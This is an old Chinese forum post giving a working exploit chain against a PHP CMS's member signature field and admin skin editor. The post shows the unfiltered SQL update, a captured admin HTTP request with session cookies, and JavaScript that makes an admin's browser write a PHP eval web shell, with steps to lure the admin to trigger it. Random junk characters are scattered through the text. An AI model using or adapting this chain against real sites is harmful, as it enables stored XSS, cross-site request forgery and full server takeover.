|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题* T$ g- a. k! }9 q- ^9 [
官网已经修补了,所以重新下了源码6 @( o4 T4 {" u' U
因为 后台登入 还需要认证码 所以 注入就没看了。& `# @. w3 Y j$ [# [: }9 a& m7 U% I9 l
存在 xss: F3 n7 O2 \& w$ z
漏洞文件 user/member/skin_edit.php
/ Y1 K5 O b3 { v本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:$ h! G1 c$ O& E4 M5 [
( }) C. N7 s/ p5 j</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
5 a4 z8 {0 e k2 Z
0 W2 a* {( l. |4 g+ H( }</textarea></td></tr>
; T: N: X8 V+ e1 { * F& i+ T6 Y6 Q
user/do.php / V. N; q) V1 D4 J, H9 f8 p
6 N0 y3 j0 K: r1 W# V4 S1 k
4 n' ]3 e0 S, t+ A; \if($op=='zl'){ //资料$ K4 e6 ~& U8 D' c" _; N
8 N( ~/ p0 L0 T. |! E! b
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 5 D& b3 G8 q/ @8 q* F; k( N
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
) N- n* H1 I. r7 G$ \- \
' X* N& ? K, X& J* _$ r $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',+ M* }% } M: W5 ~# {3 h
* s/ I9 t# \* N2 `' \+ i5 V
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
* ]/ I5 m+ }3 l; r9 y! \# h where CS_Name='".$cscms_name."'";
, Y& c# Y* S) a N
; k1 z/ o; S9 R2 ^ if($db->query($sql)){2 [. c3 Y( K) J% X
' Q9 B+ `# ~! r' M m7 X! i
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));# }8 \4 Q5 F' h7 g
W& ~" ~1 ~) Z( ^3 j, T }else{
. H- Y- O* g) S$ J) ?7 _ 9 j9 |2 n( z' r
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
5 Y9 G- [3 q8 A% J2 z: K! g
1 r# D. u; X5 T; H }
6 g3 o1 L5 R/ s; E( o7 L- G1 p
5 K2 h7 k& e8 m没有 过滤导致xss产生。& n6 G' u. F# s8 J5 @6 U$ [
后台 看了下 很奇葩的是可以写任意格式文件。。9 x9 Z8 {, e$ Z- j' l
抓包。。
% w1 t& X; H- T& z0 m! t7 j t( I5 T8 J7 {" A- P
8 V- ] H }& _: D6 w5 H7 p
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1+ p1 g" ?+ D0 y
7 b. C1 _3 m8 S x8 Q
Accept: text/html, application/xhtml+xml, */*0 N$ z* ^/ p5 d$ k; Z& b8 V- ~% J
% K$ d% h9 i0 V( M) XReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
$ J/ \% c$ U4 e, Q" V# s6 g% T
l. g! R% g: I1 h! eAccept-Language: zh-CN
- S8 A8 J- r7 G% d. @ h" y9 c2 O+ b8 ?6 W6 q
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)8 b5 f- Q/ x2 R: F+ @( r
+ g! V/ J9 |6 X) j
Content-Type: application/x-www-form-urlencoded
$ k. Q+ y' t# Z8 q7 _' v' j
: s) r3 S, l" h; d& _Accept-Encoding: gzip, deflate
d( T$ t" E! X$ T& o
i% g/ D! F) l; S$ X" HHost: 127.0.0.1
, v" T$ O3 u- c! R& l: c9 m ! f3 n0 d, ^8 n+ }4 p' P8 I
Content-Length: 38: y1 p7 J' E. Z. ^; l' i
% ^' A' T/ h! m9 ` K& p+ r; e
DNT: 13 H4 s5 m! S2 _. |2 Q) y3 C
7 @: W6 ^& M' UConnection: Keep-Alive
6 d# Y7 _7 s- \4 O8 ~+ d6 o6 M8 g / `9 h' M1 N2 P4 P: r
Cache-Control: no-cache5 M0 y' O$ q+ X! T& p) g
( n6 w4 w1 z4 [( U/ m, X3 aCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 z2 h* f8 P. H& T7 _
# B4 i+ `8 l, x. j* \8 E
$ p7 ~, ~6 d- Q7 ?% [name=aaa.php&content=%3Cs%3E%3Ca%25%3E
, p# O7 [& x; ~' ]' q, @. q
! P6 I: J! u3 [0 @
9 x( w/ j9 y5 O. \% k8 u+ C" a) }: V$ ] T
于是 构造js如下。$ c* j- s' O- C1 i/ y
7 t& G3 d- [; Q本帖隐藏的内容<script> + ]. V6 I: m: B7 C+ o
thisTHost = top.location.hostname;
& F4 X+ \3 T/ d" y" _ 6 @; Q/ [# j! ?) F x& \
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
* ^9 F- }1 W) w7 Q% X( X- Y 2 C; }8 F4 j- g; }1 ^
function PostSubmit(url, data, msg) { # u$ e1 D/ C6 N2 [$ E
var postUrl = url;+ w- u3 `8 z5 k2 _% I
) J0 Z- d. D- c5 d var postData = data; , g& B0 n' i8 n: J/ n( ?. x$ q8 N
var msgData = msg; & E' s( R: W/ Q) Z7 w* W/ J
var ExportForm = document.createElement("FORM"); ; s9 Q' z! ` d) y- B: d) S) c% p
document.body.appendChild(ExportForm);
* E$ c" C! D2 Q% j2 u/ b1 @ ExportForm.method = "POST";
# f' D. H E# [" ~# ?: F G! U var newElement = document.createElement("input");
- h5 f n4 U8 E5 p& E8 ~, ^ newElement.setAttribute("name", "name");
; R8 T1 V: X# U" B; V newElement.setAttribute("type", "hidden");
) r0 E% S% j( s- r' N- N* c var newElement2 = document.createElement("input"); 6 C5 k6 l1 y1 q Q) w9 b% P# w% O T
newElement2.setAttribute("name", "content");
3 ] A% l8 `# C1 d; R6 Y newElement2.setAttribute("type", "hidden");
9 U; i; j) d4 c. L' I ExportForm.appendChild(newElement);
& [! j g, V8 N. A! R6 M/ L( N ExportForm.appendChild(newElement2); 4 {: v# _/ R8 K& L; J7 [& Q
newElement.value = postData; ' H7 @; R8 Q( B6 x/ h
newElement2.value = msgData; 8 m2 i. @% }' i& e
ExportForm.action = postUrl;
1 ^" I4 a8 K9 M' j ExportForm.submit(); ; L; l1 t. J$ y' P! r# t
};
- J; v1 R% [: q0 ` 8 N+ ~$ b0 K4 t0 t6 U% S8 T5 I: r
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");, U: b, ^3 O3 {( b1 p4 t. F% @! z
* H; M3 s' H) C
</script>
: Q9 D) G6 [7 U" ~- l& M i% O$ ]" U6 C( L
9 _2 W D2 i. a9 t9 i5 _( `' _+ X; r r; [- U" Z+ H' X
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
. a8 @# I5 Q+ f# }用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)2 T, e% R) h6 v; X: P+ E
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
' h/ D/ z9 z1 h( [* E# W
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对